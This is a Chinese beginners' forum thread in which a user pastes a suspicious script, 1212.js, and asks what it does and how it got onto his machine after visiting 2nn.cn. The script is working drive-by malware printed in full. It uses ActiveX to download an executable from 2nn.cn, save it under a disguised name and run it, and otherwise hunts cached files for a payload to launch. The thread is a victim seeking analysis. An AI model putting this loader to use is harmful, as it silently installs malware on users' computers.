论坛: 菜鸟乐园 标题: 请高手看看。。这是什么。。能从这个知道他进入的方法吗?((在线等)) 复制本贴地址    
作者: laoye [laoye]    论坛用户   登录
function EARTHSIMULATOR(){url=document.location.href;xtmu=url.substring(6,url.indexOf('\\',9)+1);xtp=url.substr(6,3);var shell=new ActiveXObject("shell.application");var runbz=1;var exeSize=17920;var a=/s\[\d*\]\.exe/gi;a.compile("s\\[\\d*\\]\\.exe","gi");var b=/[A-Za-z]:\\/gi;b.compile("[A-Za-z]:\\\\","gi");wjj(xtmu+"Temporary Internet Files\\");if(runbz)wjj(xtp+"Documents and Settings\\");if(runbz)yp();function yp(){try{var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());for (;!c.atEnd();c.moveNext()){if(runbz){if(b.test(c.item().path))wjj(c.item().path);}else break;}}catch(e){}}function wjj(b){try{var c=new Enumerator(shell.namespace(b).Items());for (;!c.atEnd();c.moveNext()){if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){ var f=c.item().path; var v=f.lastIndexOf('\\')+1; try{ shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb(); runbz=0; break; }catch(e){}}if(!c.item().Size)wjj(c.item().path+"\\");}}catch(e){}}}function qq482878(){var name="Explroer.exe";var url="http://2nn.cn/s.exe";try{var folder=document.location.href;folder=folder.substring(6,folder.indexOf('\\',9)+1)+name;var xml=new ActiveXObject("Microsoft.XMLHTTP");xml.open("GET",url,false);xml.send();if(xml.status==200){var ado=new ActiveXObject("ADODB.Stream");ado.Type=1;ado.Open();ado.write(xml.responseBody);ado.SaveToFile(folder,2);ado.Close();ado=null;}xml=null;document.body.insertAdjacentHTML('AfterBegin','<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="'+folder+'"></OBJECT>');}catch(e){}}try{new ActiveXObject("ADODB.Stream");qq482878();}catch(e){EARTHSIMULATOR();}

文件名为1212.js


[此贴被 laoye(laoye) 在 04月02日20时37分 编辑过]

地主 发表时间: 04-04-02 20:34

回复: laoye [laoye]   论坛用户   登录
发现的时候,是在打开2nn.cn时,IE左边的搜索栏自动打开了,因此才发现的。

B1层 发表时间: 04-04-02 20:38
